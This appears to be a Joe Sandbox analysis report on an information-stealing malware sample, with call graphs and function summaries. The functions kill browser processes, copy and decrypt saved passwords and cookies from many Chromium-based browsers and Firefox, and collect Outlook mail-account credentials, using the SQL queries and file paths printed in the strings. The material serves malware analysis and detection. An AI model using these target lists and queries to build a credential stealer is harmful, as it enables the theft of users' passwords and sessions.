68110->68111 68166 e454340 10 API calls 68111->68166 68113 e453761 68114 e453c14 21 API calls 68113->68114 68115 e453781 68114->68115 68116 e453c14 21 API calls 68115->68116 68117 e453790 68116->68117 68118 e453c14 21 API calls 68117->68118 68119 e45379f 68118->68119 68120 e453c14 21 API calls 68119->68120 68120->68091 68122 e453cc0 21 API calls 68121->68122 68123 e45348f SHGetValueA 68122->68123 68124 e4534d5 68123->68124 68128 e453653 68123->68128 68125 e453cc0 21 API calls 68124->68125 68126 e4534f2 68125->68126 68127 e4541d0 21 API calls 68126->68127 68129 e453508 68127->68129 68130 e453c14 21 API calls 68128->68130 68131 e45437c 21 API calls 68129->68131 68132 e45367c 68130->68132 68133 e45351a 68131->68133 68132->68090 68167 e45430c 21 API calls 68133->68167 68135 e453527 68137 e453c14 21 API calls 68135->68137 68144 e453561 68135->68144 68136 e453c14 21 API calls 68138 e4535a3 68136->68138 68142 e453543 memcpy_s 68137->68142 68139 e453c14 21 API calls 68138->68139 68140 e4535b2 68139->68140 68141 e453c14 21 API calls 68140->68141 68143 e4535c1 68141->68143 68142->68144 68145 e453c14 21 API calls 68143->68145 68144->68136 68144->68142 68146 e4535d1 68145->68146 68147 e453cc0 21 API calls 68146->68147 68148 e4535e1 SHGetValueA 68147->68148 68148->68128 68149 e45362c 68148->68149 68150 e453cc0 21 API calls 68149->68150 68151 e453651 68150->68151 68151->68128 68154 e454215 68152->68154 68153 e453ef4 10 API calls 68155 e4542e9 68153->68155 68156 e45426d 68154->68156 68162 e454282 68154->68162 68182 e4d5280 10 API calls 2 library calls 68154->68182 68168 e453a44 68155->68168 68157 e454284 68156->68157 68158 e454274 68156->68158 68157->68162 68164 e453c14 21 API calls 68157->68164 68183 e4540ac 21 API calls new 68158->68183 68162->68153 68163 e4537c2 LoadLibraryA 68163->68096 68164->68162 68165->68106 68166->68113 68167->68135 68170 e453a63 68168->68170 68169 e453ac7 68171 e453b70 68169->68171 68172 e453ada 68169->68172 68170->68169 68174 e453a9d 68170->68174 68185 e4d5280 10 API calls 2 library calls 68171->68185 68175 e453b7c 68172->68175 68176 e453aed 68172->68176 68181 e453abf memcpy_s 68172->68181 68180 e453ef4 10 API calls 68174->68180 68186 e4d5280 10 API calls 2 library calls 68175->68186 68176->68181 68184 e4540ac 21 API calls new 68176->68184 68180->68181 68181->68163 68187->67927 68189->67943 68191->67958 68192->67958 68193->67958 68194->67963 68196 e457708 6 API calls 68195->68196 68197 e455971 CopyFileA 68196->68197 68198 e455986 wcsftime 68197->68198 68199 e45599e 68197->68199 68198->67968 68199->68198 68200 e455e5c 16 API calls 68199->68200 68201 e4559c2 68200->68201 68201->68198 68202 e4559ed GetProcessHeap HeapAlloc 68201->68202 68203 e455a23 68201->68203 68202->68203 68204 e455a0d 68202->68204 68205 e4a7ee8 CloseHandle 68203->68205 68204->68203 68206 e455a55 68205->68206 68207 e455a72 GetProcessHeap 68206->68207 68208 e455a5e GetProcessHeap 68206->68208 68210 e455a86 __free_lconv_num 68207->68210 68209 e4f5180 __free_lconv_num 68208->68209 68209->68207 68211 e455a94 DeleteFileA 68210->68211 68211->68198 68212 3038a58 68213 3038a79 68212->68213 68215 3038a72 68212->68215 68214 3038b63 GetProcAddress GetProcAddressForCaller 68213->68214 68213->68215 68214->68215 68216 83843c4 68222 83841b4 68216->68222 68218 83843cd 68219 83843eb 68218->68219 68221 83843df 68218->68221 68221->68218 68244 838c704 NtDelayExecution 68221->68244 68223 83841d4 68222->68223 68245 8386cb4 68223->68245 68225 83841dd 68225->68218 68226 83841d9 68226->68225 68227 83841fa GetCurrentProcess IsWow64Process 68226->68227 68227->68225 68228 8384227 68227->68228 68257 8387274 GetAdaptersInfo 68228->68257 68230 838422c 68230->68225 68231 8384266 CreateMutexW 68230->68231 68231->68225 68232 8384286 GetLastError 68231->68232 68232->68225 68233 83842ac GetModuleHandleW 68232->68233 68264 8384c2c 15 API calls 68233->68264 68235 83842c1 68236 83842c5 68235->68236 68265 8387314 NtAllocateVirtualMemory 68235->68265 68236->68225 68238 83842d1 68238->68236 68266 83871f0 NtAllocateVirtualMemory 68238->68266 68240 83842e1 68240->68236 68241 83842ec CreateThread 68240->68241 68242 8384317 68241->68242 68267 8386c6c CreateThread 68242->68267 68244->68221 68246 8386cbd 68245->68246 68256 8386cf3 68246->68256 68268 838abe8 GetProcAddress 68246->68268 68248 8386ccf 68248->68256 68269 83899d0 GetProcAddress 68248->68269 68250 8386cd8 68250->68256 68270 838aa0c 68250->68270 68254 8386cea 68254->68256 68275 838b2a4 GetProcAddress 68254->68275 68256->68226 68258 83872ad 68257->68258 68263 83872d1 68257->68263 68276 838b388 NtAllocateVirtualMemory 68258->68276 68259 83872df 68259->68230 68262 83872b8 GetAdaptersInfo 68262->68263 68263->68259 68278 83882b4 68263->68278 68264->68235 68265->68238 68266->68240 68267->68236 68268->68248 68269->68250 68273 838ab3d 68270->68273 68271 8386ce1 68271->68256 68274 8389350 GetProcAddress 68271->68274 68272 838a8e0 7 API calls 68272->68273 68273->68271 68273->68272 68274->68254 68275->68256 68277 838b3c8 68276->68277 68277->68262 68279 83882ce NtFreeVirtualMemory 68278->68279 68280 83882ef 68278->68280 68279->68280 68280->68259 68281 303545d 68282 30353a4 68281->68282 68283 3035265 68281->68283 68284 3035456 68282->68284 68286 30382b4 NtFreeVirtualMemory 68282->68286 68285 3035315 68283->68285 68287 3035292 68283->68287 68288 303532e HttpOpenRequestA 68285->68288 68286->68284 68289 30352c7 HttpOpenRequestA 68287->68289 68291 303539c 68288->68291 68289->68291 68291->68282 68292 30353b3 InternetSetOptionA 68291->68292 68293 30353d6 68291->68293 68292->68293 68294 3035424 HttpSendRequestA 68293->68294 68297 30353e0 68293->68297 68295 3035443 68294->68295 68295->68282 68296 303544c 68295->68296 68298 30382b4 NtFreeVirtualMemory 68296->68298 68299 30353fb HttpSendRequestA 68297->68299 68298->68284 68299->68295

                                                                    Executed Functions

                                                                    Function 0E454B50 Relevance: 177.4, APIs: 16, Strings: 85, Instructions: 645memoryfilestringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 e454b50-e454b9a 1 e454b9e-e454baf call e4510a0 0->1 4 e454bb5-e454bbd 1->4 5 e454c66 1->5 4->1 6 e454bbf-e454bd6 4->6 7 e454c69-e454c6b 5->7 8 e454bdb-e454bec call e4510a0 6->8 9 e454c75-e4550cf call e454948 call e456e2c call e456e54 call e453cc0 * 3 call e45437c * 2 7->9 10 e454c6d-e454c70 7->10 8->5 17 e454bee-e454bf6 8->17 45 e4550d4-e4553ac call e4571ac call e453c14 * 5 call e456ed8 call e454a90 * 2 call e456f6c call e456e2c call e456e54 call e4575f8 call e457c00 call e457680 call e456ed8 call e454a90 * 2 call e456f6c call e456e2c call e456e54 call e4575f8 call e45842c * 2 call e457680 call e456ed8 call e454a90 * 2 call e456f6c call e456e2c call e456e54 call e4575f8 call e458848 call e4589e4 call e457680 call e456ed8 call e454a90 * 2 call e456f6c call e456e2c call e456e54 call e4575f8 call e457c00 call e457680 call e456ed8 call e454a90 * 2 call e456f6c call e456e2c call e456e54 call e4575f8 call e45453c 9->45 46 e4550d1 9->46 12 e455785-e45579b 10->12 17->8 19 e454bf8-e454bff call e4511d4 17->19 19->5 25 e454c01-e454c08 call e45189c 19->25 25->5 30 e454c0a call e4516f4 25->30 34 e454c0f-e454c11 30->34 34->5 36 e454c13-e454c36 34->36 38 e454c3b-e454c56 call e45163c 36->38 38->5 44 e454c58-e454c60 38->44 44->38 48 e454c62-e454c64 44->48 152 e4553b1-e4553d8 wsprintfA call e45453c 45->152 46->45 48->7 155 e4553da-e4553df 152->155 156 e4553f1-e4554fb call e457680 call e456ed8 call e454a90 * 2 call e456f6c call e456e2c call e456e54 call e4575f8 call e455abc call e457680 call e456ed8 call e454a90 * 2 call e456f6c call e456e2c call e456e54 call e4575f8 SHGetFolderPathA 155->156 157 e4553e1-e4553ec call e457680 * 2 155->157 195 e455537-e455672 call e457680 call e456ed8 call e454a90 * 2 call e456f6c call e456e2c call e456e54 call e4575f8 call e455d94 call e457680 call e456ed8 call e454a90 * 2 call e456f6c call e456e2c call e456e54 call e4575f8 call e455abc call e457680 call e456ed8 call e454a90 * 2 call e456f6c 156->195 196 e4554fd-e455532 lstrcatA call e456604 156->196 157->156 244 e455783 195->244 245 e455678-e455686 195->245 196->195 244->12 246 e455690-e4556ae GetProcessHeap HeapAlloc 245->246 247 e455688-e45568b 245->247 248 e455751-e455754 246->248 249 e4556b4-e4556ff call e4f5098 call e452300 OpenFileMappingA 246->249 247->248 250 e455756-e455764 GetProcessHeap call e4f5180 248->250 251 e45576a-e45576d 248->251 259 e455701-e45572d MapViewOfFile UnmapViewOfFile CloseHandle 249->259 260 e455733-e45574c call e454824 call e454878 249->260 250->251 251->244 254 e45576f-e45577d GetProcessHeap call e4f5180 251->254 254->244 259->260 260->248
                                                                    APIs
                                                                      • Part of subcall function 0E454948: CreateToolhelp32Snapshot.KERNEL32 ref: 0E454969
                                                                      • Part of subcall function 0E454948: Process32First.KERNEL32 ref: 0E45498C
                                                                      • Part of subcall function 0E454948: GetCurrentProcessId.KERNEL32 ref: 0E45499A
                                                                      • Part of subcall function 0E454948: Process32Next.KERNEL32 ref: 0E454A58
                                                                      • Part of subcall function 0E454948: CloseHandle.KERNEL32 ref: 0E454A69
                                                                      • Part of subcall function 0E456E2C: GetProcessHeap.KERNEL32 ref: 0E456E30
                                                                      • Part of subcall function 0E456E2C: HeapAlloc.KERNEL32 ref: 0E456E42
                                                                      • Part of subcall function 0E458848: RegOpenKeyExA.ADVAPI32 ref: 0E45887F
                                                                      • Part of subcall function 0E458848: CoInitialize.OLE32 ref: 0E458891
                                                                      • Part of subcall function 0E458848: CoCreateInstance.OLE32 ref: 0E4588B4
                                                                      • Part of subcall function 0E458848: StrStrIW.SHLWAPI ref: 0E458933
                                                                      • Part of subcall function 0E458848: CoTaskMemFree.OLE32 ref: 0E458956
                                                                      • Part of subcall function 0E458848: CoTaskMemFree.OLE32 ref: 0E458965
                                                                      • Part of subcall function 0E458848: RegCloseKey.ADVAPI32 ref: 0E4589A1
                                                                      • Part of subcall function 0E4589E4: LoadLibraryA.KERNEL32 ref: 0E458A1B
                                                                      • Part of subcall function 0E4589E4: GetProcAddress.KERNEL32 ref: 0E458A37
                                                                      • Part of subcall function 0E4589E4: GetProcAddress.KERNEL32 ref: 0E458A4E
                                                                      • Part of subcall function 0E4589E4: GetProcAddress.KERNEL32 ref: 0E458A65
                                                                      • Part of subcall function 0E4589E4: GetProcAddress.KERNEL32 ref: 0E458A7C
                                                                      • Part of subcall function 0E4589E4: GetProcAddress.KERNEL32 ref: 0E458A93
                                                                      • Part of subcall function 0E4589E4: GetProcAddress.KERNEL32 ref: 0E458AB1
                                                                      • Part of subcall function 0E454A90: GetProcessHeap.KERNEL32 ref: 0E454AE0
                                                                      • Part of subcall function 0E454A90: HeapReAlloc.KERNEL32 ref: 0E454AFA
                                                                      • Part of subcall function 0E456F6C: GetProcessHeap.KERNEL32 ref: 0E456F87
                                                                      • Part of subcall function 0E456F6C: HeapFree.KERNEL32 ref: 0E456F95
                                                                      • Part of subcall function 0E456F6C: GetProcessHeap.KERNEL32 ref: 0E456FA0
                                                                      • Part of subcall function 0E456F6C: HeapFree.KERNEL32 ref: 0E456FAE
                                                                      • Part of subcall function 0E4575F8: GetProcessHeap.KERNEL32 ref: 0E45765D
                                                                      • Part of subcall function 0E4575F8: HeapFree.KERNEL32 ref: 0E45766B
                                                                      • Part of subcall function 0E457C00: SHGetFolderPathA.SHELL32 ref: 0E457C3B
                                                                      • Part of subcall function 0E454A90: HeapAlloc.KERNEL32 ref: 0E454B06
                                                                      • Part of subcall function 0E45453C: lstrcpyA.KERNEL32 ref: 0E454564
                                                                      • Part of subcall function 0E45453C: lstrcatA.KERNEL32 ref: 0E454575
                                                                      • Part of subcall function 0E45453C: RegOpenKeyExA.ADVAPI32 ref: 0E454599
                                                                    • wsprintfA.USER32 ref: 0E4553BF
                                                                      • Part of subcall function 0E45453C: RegEnumKeyExA.ADVAPI32 ref: 0E4545E0
                                                                      • Part of subcall function 0E45453C: RegOpenKeyExA.ADVAPI32 ref: 0E454622
                                                                      • Part of subcall function 0E45453C: lstrcpyW.KERNEL32 ref: 0E454650
                                                                      • Part of subcall function 0E45453C: RegQueryValueExW.ADVAPI32 ref: 0E454686
                                                                      • Part of subcall function 0E45453C: RegCloseKey.ADVAPI32 ref: 0E4547A7
                                                                      • Part of subcall function 0E45453C: RegEnumKeyExA.ADVAPI32 ref: 0E4547DF
                                                                      • Part of subcall function 0E45453C: RegCloseKey.ADVAPI32 ref: 0E4547FA
                                                                    • SHGetFolderPathA.SHELL32 ref: 0E4554F3
                                                                    • lstrcatA.KERNEL32 ref: 0E455508
                                                                      • Part of subcall function 0E455ABC: SHGetFolderPathA.SHELL32 ref: 0E455AF7
                                                                    • GetProcessHeap.KERNEL32 ref: 0E455690
                                                                    • HeapAlloc.KERNEL32 ref: 0E4556A2
                                                                    • WideCharToMultiByte.KERNEL32 ref: 0E4556D2
                                                                    • OpenFileMappingA.KERNEL32 ref: 0E4556F3
                                                                    • MapViewOfFile.KERNEL32 ref: 0E455718
                                                                    • UnmapViewOfFile.KERNEL32 ref: 0E455724
                                                                    • CloseHandle.KERNEL32 ref: 0E45572D
                                                                    • wprintf.LEGACY_STDIO_DEFINITIONS ref: 0E45573D
                                                                    • wprintf.LEGACY_STDIO_DEFINITIONS ref: 0E45574C
                                                                    • GetProcessHeap.KERNEL32 ref: 0E455756
                                                                    • HeapFree.KERNEL32 ref: 0E455764
                                                                    • GetProcessHeap.KERNEL32 ref: 0E45576F
                                                                    • HeapFree.KERNEL32 ref: 0E45577D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.4555139839.000000000E450000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E450000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_e450000_explorer.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Free$AddressProc$Close$AllocOpen$FileFolderPath$CreateEnumHandleProcess32TaskViewlstrcatlstrcpywprintf$ByteCharCurrentFirstInitializeInstanceLibraryLoadMappingMultiNextQuerySnapshotToolhelp32UnmapValueWidewsprintf
                                                                    • String ID: %s$%s$00:39:18$12345$1Email$1HTTP Server URL$1HTTP User$1HTTPMail Password2$1HTTPMail Server$1HTTPMail User Name$1IMAP Password2$1IMAP Server$1IMAP User$1IMAP User Name$1NNTP Email Address$1NNTP Password2$1NNTP Server$1NNTP User Name$1POP3 Password2$1POP3 Server$1POP3 User$1POP3 User Name$1SMTP Email Address$1SMTP Password2$1SMTP Server$1SMTP User$1SMTP User Name$2IMAP Port$2POP3 Port$2SMTP Port$360Browser\Browser$3HTTPMail Password$3IMAP Password$3NNTP Password$3POP3 Password$3SMTP Password$7Star\7Star$@$Amigo$Bromium$CentBrowser$Chedot$Chromium$CocCoc\Browser$Comodo\Dragon$Elements Browser$Epic Privacy Browser$Go!$Google\Chrome$Google\Chrome SxS$Kometa$Mar 29 2024$Microsoft\Edge$Nichrome$Orbitum$QIP Surf$Rafotech\Mustang$RockMelt$Safer Technologies\Secure Browser$Software\Microsoft\Office\%u.0\Outlook\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$Sputnik\Sputnik$Suhba$Superbird$Torch$Vivaldi$Xpom$Yandex\YandexBrowser$\Mozilla\Firefox\Profiles\$\User Data\Default\Login Data$\User Data\Default\Network\Cookies$\User Data\Default\Web Data$build$cookies.sqlite$cr_cookie$cr_pass$edge_cookie$edge_pass$ff_cookie$ff_pass$ie_cookie$ie_pass$outlook_pass$uCozMedia\Uran$w~y&
                                                                    • API String ID: 3620056986-83399204
                                                                    • Opcode ID: f8cb71ce208a17df0a9b5c5da18c7179ac2a3ecd80bdeebe11308395ec280a4b
                                                                    • Instruction ID: cf5a9100bccec7f9258b73c542008ddf102f16a29e9035da6d25e14daf47e583
                                                                    • Opcode Fuzzy Hash: f8cb71ce208a17df0a9b5c5da18c7179ac2a3ecd80bdeebe11308395ec280a4b
                                                                    • Instruction Fuzzy Hash: 82621776201F8195EA10EF22EC903D933A5F745B89F811D6BDA5E2B725EF78CA48C340
                                                                    Function 0E454948 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 77processCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 610 e454948-e454976 CreateToolhelp32Snapshot 611 e45497c-e454994 Process32First 610->611 612 e454a6f-e454a8c 610->612 613 e454a66-e454a69 CloseHandle 611->613 614 e45499a-e4549a2 call e4f5090 611->614 613->612 617 e454a50-e454a60 Process32Next 614->617 617->613 618 e4549a7-e4549b3 617->618 618->617 619 e4549b9-e4549bc 618->619 619->617 620 e4549c2-e4549d5 OpenProcess 619->620 620->617 621 e4549d7-e454a31 StrStrIA * 3 620->621 622 e454a33-e454a36 621->622 623 e454a3c-e454a41 TerminateProcess 621->623 622->623 624 e454a38-e454a3a 622->624 625 e454a47-e454a4a CloseHandle 623->625 624->623 624->625 625->617
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.4555139839.000000000E450000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E450000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_e450000_explorer.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseHandleProcess32$CreateCurrentFirstNextOpenSnapshotTerminateToolhelp32
                                                                    • String ID: chrome.exe$iexplore.exe$msedge.exe
                                                                    • API String ID: 477742948-2002101784
                                                                    • Opcode ID: fe7781aa355af09044517de538f76c2667a12ca60234848eb8ea9a4026d88ee0
                                                                    • Instruction ID: e9e07e33d7f90c875e6a71cd1f27f88cc2251d0b6f49ce7a027258d4ec001637
                                                                    • Opcode Fuzzy Hash: fe7781aa355af09044517de538f76c2667a12ca60234848eb8ea9a4026d88ee0
                                                                    • Instruction Fuzzy Hash: A131AC32214B8185EF20CB22E91475A3771FB84B95F594A22CE6E17BA4DF3CCD8AC740
                                                                    Function 0E455E5C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 109memoryencryptionCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 626 e455e5c-e455e83 call e456500 629 e455e85-e455e87 626->629 630 e455e8c-e455e90 626->630 631 e455fcd-e455fe0 629->631 630->629 632 e455e92-e455ea9 StrStrIA 630->632 633 e455fb5-e455fca GetProcessHeap call e4f5180 632->633 634 e455eaf-e455ec4 StrChrA 632->634 633->631 634->633 636 e455eca-e455ed6 634->636 636->633 638 e455edc-e455eef call e456358 636->638 638->633 641 e455ef5-e455efb 638->641 641->633 642 e455f01-e455f36 CryptUnprotectData 641->642 642->633 643 e455f38-e455f56 GetProcessHeap HeapAlloc 642->643 643->633 644 e455f58-e455f63 643->644 645 e455f65-e455f68 644->645 646 e455fa1-e455faf LocalFree 644->646 645->646 647 e455f6a-e455f88 GetProcessHeap HeapAlloc 645->647 646->633 647->646 648 e455f8a-e455f8d 647->648 649 e455f90-e455f9c 648->649 649->649 650 e455f9e 649->650 650->646
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.4555139839.000000000E450000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E450000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_e450000_explorer.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocFree$CreateCryptDataFileLocalUnprotect
                                                                    • String ID: "encrypted_key":"
                                                                    • API String ID: 3383461352-877455259
                                                                    • Opcode ID: 1bff8699f9d97ab45fd99e227eb735527e09be475eebc417901f9c033e89b636
                                                                    • Instruction ID: 5450d8f83d5f968f034b0754b82716181543c4784f686c632928b4b0a46149a5
                                                                    • Opcode Fuzzy Hash: 1bff8699f9d97ab45fd99e227eb735527e09be475eebc417901f9c033e89b636
                                                                    • Instruction Fuzzy Hash: 61419E33711B909AEB108F66E8543AE67B1BB48B98F494427DE0A93B59EF3CD845C300
                                                                    Function 0E457A88 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98memoryfileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 684 e457a88-e457ac8 call e457708 CopyFileA 687 e457ae2-e457afc call e4d2b38 684->687 688 e457aca-e457ad3 call e4f50c0 684->688 694 e457adb-e457add 687->694 695 e457afe-e457b0c call e455e5c 687->695 693 e457ad5 call e4f50c0 688->693 688->694 693->694 697 e457be8-e457bff 694->697 695->694 700 e457b0e-e457b2a 695->700 701 e457b67 700->701 702 e457b2c-e457b2f 700->702 703 e457b69-e457ba0 call e4a7ee8 701->703 702->701 704 e457b31-e457b4f GetProcessHeap HeapAlloc 702->704 710 e457bb6-e457be3 GetProcessHeap call e4f5180 call e4d0c7c DeleteFileA 703->710 711 e457ba2-e457bb0 GetProcessHeap call e4f5180 703->711 704->701 705 e457b51-e457b54 704->705 707 e457b57-e457b63 705->707 707->707 709 e457b65 707->709 709->703 710->697 711->710
                                                                    APIs
                                                                      • Part of subcall function 0E457708: GetTempPathA.KERNEL32 ref: 0E457727
                                                                      • Part of subcall function 0E457708: lstrcatA.KERNEL32 ref: 0E45773D
                                                                      • Part of subcall function 0E457708: lstrlenA.KERNEL32 ref: 0E457746
                                                                      • Part of subcall function 0E457708: wsprintfA.USER32 ref: 0E45788A
                                                                      • Part of subcall function 0E457708: lstrcatA.KERNEL32 ref: 0E4578A0
                                                                      • Part of subcall function 0E457708: lstrlenA.KERNEL32 ref: 0E4578AD
                                                                    • CopyFileA.KERNEL32 ref: 0E457AC0
                                                                    • GetLastError.KERNEL32 ref: 0E457ACA
                                                                    • GetLastError.KERNEL32 ref: 0E457AD5
                                                                    • GetProcessHeap.KERNEL32 ref: 0E457B31
                                                                    • HeapAlloc.KERNEL32 ref: 0E457B43
                                                                    • GetProcessHeap.KERNEL32 ref: 0E457BA2
                                                                    • HeapFree.KERNEL32 ref: 0E457BB0
                                                                    • GetProcessHeap.KERNEL32 ref: 0E457BB6
                                                                    • HeapFree.KERNEL32 ref: 0E457BC4
                                                                    • DeleteFileA.KERNEL32 ref: 0E457BDD
                                                                    Strings
                                                                    • SELECT origin_url,username_value,length(password_value),password_value,date_created,date_last_used FROM logins WHERE username_value <> '', xrefs: 0E457B82
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.4555139839.000000000E450000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E450000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_e450000_explorer.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$ErrorFileFreeLastlstrcatlstrlen$AllocCopyDeletePathTempwsprintf
                                                                    • String ID: SELECT origin_url,username_value,length(password_value),password_value,date_created,date_last_used FROM logins WHERE username_value <> ''
                                                                    • API String ID: 1126038018-4010397166
                                                                    • Opcode ID: 0ff698bb61df7e7270a5b28c3d57b083742cbda33f9715b01bb2336eae2b636a
                                                                    • Instruction ID: 487cf2fe04f21f9a5c8f92ea8bd8f00f588244a731017ab37c68cccba178eaf5
                                                                    • Opcode Fuzzy Hash: 0ff698bb61df7e7270a5b28c3d57b083742cbda33f9715b01bb2336eae2b636a
                                                                    • Instruction Fuzzy Hash: 1541A032615BC096EB20DF22E95879E67A1FB89B84F488437DE4A13B14DF3CD949C700
                                                                    Function 0E455944 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98memoryfileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 651 e455944-e455984 call e457708 CopyFileA 654 e455986-e45598f call e4f50c0 651->654 655 e45599e-e4559b8 call e4d2b38 651->655 660 e455997-e455999 654->660 662 e455991 call e4f50c0 654->662 655->660 661 e4559ba-e4559c8 call e455e5c 655->661 663 e455aa4-e455abb 660->663 661->660 667 e4559ca-e4559e6 661->667 662->660 668 e455a23 667->668 669 e4559e8-e4559eb 667->669 671 e455a25-e455a5c call e4a7ee8 668->671 669->668 670 e4559ed-e455a0b GetProcessHeap HeapAlloc 669->670 670->668 672 e455a0d-e455a10 670->672 676 e455a72-e455a9f GetProcessHeap call e4f5180 call e4d0c7c DeleteFileA 671->676 677 e455a5e-e455a6c GetProcessHeap call e4f5180 671->677 675 e455a13-e455a1f 672->675 675->675 678 e455a21 675->678 676->663 677->676 678->671
                                                                    APIs
                                                                      • Part of subcall function 0E457708: GetTempPathA.KERNEL32 ref: 0E457727
                                                                      • Part of subcall function 0E457708: lstrcatA.KERNEL32 ref: 0E45773D
                                                                      • Part of subcall function 0E457708: lstrlenA.KERNEL32 ref: 0E457746
                                                                      • Part of subcall function 0E457708: wsprintfA.USER32 ref: 0E45788A
                                                                      • Part of subcall function 0E457708: lstrcatA.KERNEL32 ref: 0E4578A0
                                                                      • Part of subcall function 0E457708: lstrlenA.KERNEL32 ref: 0E4578AD
                                                                    • CopyFileA.KERNEL32 ref: 0E45597C
                                                                    • GetLastError.KERNEL32 ref: 0E455986
                                                                    • GetLastError.KERNEL32 ref: 0E455991
                                                                    • GetProcessHeap.KERNEL32 ref: 0E4559ED
                                                                    • HeapAlloc.KERNEL32 ref: 0E4559FF
                                                                    • GetProcessHeap.KERNEL32 ref: 0E455A5E
                                                                    • HeapFree.KERNEL32 ref: 0E455A6C
                                                                    • GetProcessHeap.KERNEL32 ref: 0E455A72
                                                                    • HeapFree.KERNEL32 ref: 0E455A80
                                                                    • DeleteFileA.KERNEL32 ref: 0E455A99
                                                                    Strings
                                                                    • select name, encrypted_value, length(encrypted_value), host_key, path, creation_utc, expires_utc, is_secure, is_httponly, has_expires from cookies where datetime(expires_utc/1000000 + strftime('%s', '1601-01-01'), 'unixepoch') > datetime('now', 'utc') OR NOT h, xrefs: 0E455A3E
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.4555139839.000000000E450000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E450000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_e450000_explorer.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$ErrorFileFreeLastlstrcatlstrlen$AllocCopyDeletePathTempwsprintf
                                                                    • String ID: select name, encrypted_value, length(encrypted_value), host_key, path, creation_utc, expires_utc, is_secure, is_httponly, has_expires from cookies where datetime(expires_utc/1000000 + strftime('%s', '1601-01-01'), 'unixepoch') > datetime('now', 'utc') OR NOT h
                                                                    • API String ID: 1126038018-1255454737
                                                                    • Opcode ID: 5b8fdea0edd62199f502c3f0406fe8560df84d62b1db6ed72439dadf72f1d3d3
                                                                    • Instruction ID: 177a1f3131e59ff336e414c41c1a16bc52ca4d8cca454a8c7ab6d20d5c8747c1
                                                                    • Opcode Fuzzy Hash: 5b8fdea0edd62199f502c3f0406fe8560df84d62b1db6ed72439dadf72f1d3d3
                                                                    • Instruction Fuzzy Hash: DE41B136714BC196EB20CF22E9543AE67A2FB89B90F484427DE4917B14DF3CD849CB00
                                                                    Function 0E4E9958 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155timeCOMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 782 e4e9958-e4e9982 call e4e8e84 call e4e8eec 787 e4e9988-e4e9993 call e4e8e8c 782->787 788 e4e9b17-e4e9b85 call e4e1ffc call e4e2240 782->788 793 e4e9999-e4e99a4 call e4e8ebc 787->793 794 e4e9b02-e4e9b16 call e4e1ffc 787->794 804 e4e9b8e-e4e9b91 788->804 805 e4e9b87-e4e9b8c 788->805 802 e4e9aed-e4e9b01 call e4e1ffc 793->802 803 e4e99aa-e4e99cd call e4e4ed0 GetTimeZoneInformation 793->803 794->788 802->794 816 e4e9ac6-e4e9aec call e4e8e7c call e4e8e6c call e4e8e74 803->816 817 e4e99d3-e4e99f5 803->817 809 e4e9b98-e4e9b9d call e4e4f10 804->809 810 e4e9b93-e4e9b96 804->810 808 e4e9bdc-e4e9bee 805->808 813 e4e9bff call e4e9958 808->813 814 e4e9bf0-e4e9bf3 808->814 819 e4e9ba2-e4e9ba8 809->819 810->808 827 e4e9c04-e4e9c30 call e4e4ed0 call e4f2bd0 813->827 814->813 818 e4e9bf5-e4e9bfd call e4e9708 814->818 821 e4e99ff-e4e9a06 817->821 822 e4e99f7-e4e99fc 817->822 818->827 825 e4e9baa 819->825 826 e4e9bb3-e4e9bce call e4e2240 819->826 830 e4e9a08-e4e9a10 821->830 831 e4e9a20-e4e9a23 821->831 822->821 834 e4e9bac-e4e9bb1 call e4e4ed0 825->834 843 e4e9bd5-e4e9bd7 call e4e4ed0 826->843 844 e4e9bd0-e4e9bd3 826->844 830->831 839 e4e9a12-e4e9a1e 830->839 837 e4e9a26-e4e9a62 call e4ed96c call e4f5098 831->837 834->810 854 e4e9a64-e4e9a67 837->854 855 e4e9a72-e4e9a75 837->855 839->837 843->808 844->834 854->855 856 e4e9a69-e4e9a70 854->856 857 e4e9a78-e4e9aae call e4f5098 855->857 856->857 860 e4e9abf-e4e9ac3 857->860 861 e4e9ab0-e4e9ab3 857->861 860->816 861->860 862 e4e9ab5-e4e9abd 861->862 862->816
                                                                    APIs
